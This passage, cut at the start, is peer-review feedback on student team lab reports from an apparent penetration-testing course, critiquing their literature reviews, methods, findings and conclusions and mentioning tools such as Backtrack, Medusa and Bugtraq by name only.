biggest issue through them all? Could some of the problems that each group found be resolved before being released? One opinion is when teaching programming that the thought of security being programmed as the application is being compiled through out the development life cycle. (http://www.devx.com/security/Article/30637) Is this a good idea for future programmers to keep in mind? Overall the team did a good job and met most of the lab requirements, there was just a couple things missing. I noticed that only one operating system was tested, or that was just gathered from the reading. Where the other operating systems tested and if they where it would be good to see any differences between them.
Team two’s abstract feels like a list of learning objectives. I wouldn’t read any farther if I wasn’t required to. Watch syntax poor grammar and spelling hurt the overall delivery.
I understand that the team is trying to integrate the articles into one cohesive literature review, but the way your discussion bounces between them is confusing. What do you think of what He and Bode have to say? Is it of any value? Are they on the right track? You transition quickly and rather poorly into Davidson’s article. The process Davidson lays out is as dissimilar to He and Bode’s flowchart as it is similar. I don’t think Davidson was talking about just reconnaissance with the baseline test. I think he was looking at a full penetration test of the system with the manufacturer’s default settings. Why are we assuming Davidson didn’t look at Thompson and Chase? Are you saying that Davidson didn’t have a vulnerability scoring mechanism in place? Did you read to the end of the article? I think you are trying to make artificial comparisons between Davidson and Thompson and Chase. They were really doing to separate but related things.
I have no idea what the group is trying to accomplish in the first part of the methods section. What am I looking at? What’s the point? I could reproduce the steps in Backtrack, but what am I attacking, and again, why? The methodology for part two for the lab is better, but still not entirely clear.
Your findings for the first part of the lab are as bad as the methods section. Retracting information? Do you mean retrieving? I understand you used Medusa. Shouldn’t you have explained (clearly) how it works in the methods section? I think you were also trying to explain the lab setup. This too belongs in methods. What was the end result? What did you get from performing the tests you theoretically outlined in the methods section?
When discussing part two, you keep referring to Bugtraq as a code repository. Is it really or is it something else? I like the table you created for part two, and I agree with the majority of your findings listed in it. The problem I see comes from the team looking for exploit code in the methods, but ending up with vulnerability databases in the findings. You attempt to define vulnerability and exploit and then appear to use them arbitrarily for the same thing. Is there a difference?
The issues section is garbled. Something was wrong with Backtrack and you had to recompile? The conclusion overall is simple, but well stated. It lets the reader know what you learned and what was accomplished. Your conclusion for part one of the lab is surprisingly good given the rest of the information. In part two, I think your methods may have lead you to false conclusions regarding vulnerabilities. While denial of service is surely common, what about exploits used to gain access (authentication) and/or breach confidentiality?